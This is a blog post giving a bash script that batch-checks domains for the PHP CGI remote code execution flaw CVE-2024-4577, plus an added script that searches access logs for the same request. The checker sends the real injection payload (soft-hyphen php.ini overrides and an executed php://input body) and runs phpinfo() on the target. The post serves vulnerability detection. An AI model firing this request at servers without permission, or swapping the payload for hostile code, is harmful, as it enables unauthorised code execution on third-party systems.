Bash detection script for the PHP CGI remote code execution vulnerability [CVE-2024-4577]
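Run the script file directly to check sites one at a time for the [CVE-2024-4577] vulnerability; run script.sh <domain_list_file> to check in batch. The domains in <domain_list_file> must be separated by \n line breaks. Each entry includes the scheme, in the form the script's interactive prompt shows (http://www.aa.com).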
#!/bin/bash

# Function to check vulnerability for a domain
check_vulnerability() {
    local domain=$1
    local response
    # POST a phpinfo() body to php-cgi.exe; the query string carries the php.ini overrides
    response=$(curl -s -X POST "${domain}/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" \
        -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" \
        -H "Accept: */*" \
        -H "Content-Type: application/x-www-form-urlencoded" \
        -H "Connection: keep-alive" \
        --data "<?php phpinfo(); ?>" \
        --max-time 10)
    # Uncomment to save the raw response for inspection:
    # echo "$response" > "$(pwd)/${domain#*//}.html"
    # phpinfo() output contains "PHP Version"; seeing it means the POST body was executed
    if [[ $response == *"PHP Version"* ]]; then
        echo "$domain: 存在漏洞"        # message: vulnerable
    else
        echo "$domain: 未检测到漏洞"    # message: no vulnerability detected
    fi
}

# Main function to iterate over domains
main() {
    local file=$1
    # "|| [ -n ... ]" also handles a last line that has no trailing newline
    while IFS= read -r domain || [ -n "$domain" ]; do
        if [[ -n "$domain" ]]; then
            echo "Testing $domain..."
            check_vulnerability "$domain"
        fi
    done < "$file"
}

# Check if the file argument is provided
if [ "$#" -ne 1 ]; then
    # No file given: interactive mode, one domain per prompt
    # Message: run "$0 <domain_list_file>" for batch checks; the file must use \n line breaks
    echo "INFO: 执行命令 $0 <domain_list_file> 可批量检测域名,<domain_list_file>需以\n作为换行符"
    check_yn="y"
    until [ "${check_yn}" == "n" ] || [ "${check_yn}" == "N" ]; do
        # Prompt: enter the domain to check for the PHP CGI argument injection vulnerability
        read -r -p "请输入检测是否存在PHP CGI 参数注入漏洞的域名(http://www.aa.com):" domain
        if [[ -n "$domain" ]]; then
            check_vulnerability "$domain"
        fi
        # Prompt: continue checking? [y/n]
        read -r -p "INFO: 是否继续检测 [y/n] " check_yn
    done
    read -r -p "Please enter any key to exit" exit_shell
else
    main "$1"
fi
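The request this script sends leaves a recognisable entry in the web server's access log. As an added example (not part of the original post), the following script scans an access log for that request shape; the "combined" log format, the function names and the sample log lines are assumptions constructed for illustration.

```shell
#!/bin/bash
# Added example (not from the original page): find requests in a web access log
# that look like the probe sent by the script above.
# Assumption: "combined" log format, so field 1 is the client IP, field 4 the
# timestamp and field 7 the raw, still percent-encoded request target.

# Print "ip<TAB>timestamp<TAB>target" for every suspicious request in log file $1.
scan_log() {
    awk '{
        target = tolower($7)
        qpos = index(target, "?")
        if (qpos == 0) next                  # no query string to inspect
        query = substr(target, qpos + 1)
        # %AD (soft hyphen) opening a query token, where an option dash would sit
        soft_hyphen = (("+" query) ~ /([+]|%20)%ad[a-z]/)
        # php.ini directives that the probe overrides from the query string
        directive = (query ~ /auto_prepend_file|allow_url_include|cgi\.force_redirect/)
        if (soft_hyphen || directive)
            printf "%s\t%s\t%s\n", $1, substr($4, 2), $7
    }' "$1"
}

# Number of suspicious requests in log file $1.
count_hits() { scan_log "$1" | wc -l | tr -d ' '; }

# Write four constructed sample log lines (documentation IP ranges) to file $1.
write_sample_log() {
    cat > "$1" <<'EOF'
192.0.2.10 - - [10/Jun/2024:08:15:02 +0000] "GET /index.php?page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jun/2024:08:15:09 +0000] "POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 90211 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jun/2024:08:16:40 +0000] "GET /search?q=co%C2%ADoperate+hand-made HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.99 - - [10/Jun/2024:08:17:11 +0000] "POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1" 404 196 "-" "curl/8.0"
EOF
}

# Usage: pass an access log path; with no argument the constructed sample is scanned.
if [ -n "${1:-}" ]; then
    scan_log "$1"
else
    sample=$(mktemp) && write_sample_log "$sample" && scan_log "$sample"
    rm -f "$sample"
fi
```

A hit with status 200 and a large response body, like the second sample line, is the case to investigate first, since it matches what the detection script treats as a vulnerable response.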
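When reposting, please credit: 半亩方塘 » PHP CGI remote code execution vulnerability [CVE-2024-4577] ransomware attack: .locked-suffix encryption, the READ_ME9.html ransom note and decryption contact details, and XAMPP site protection methods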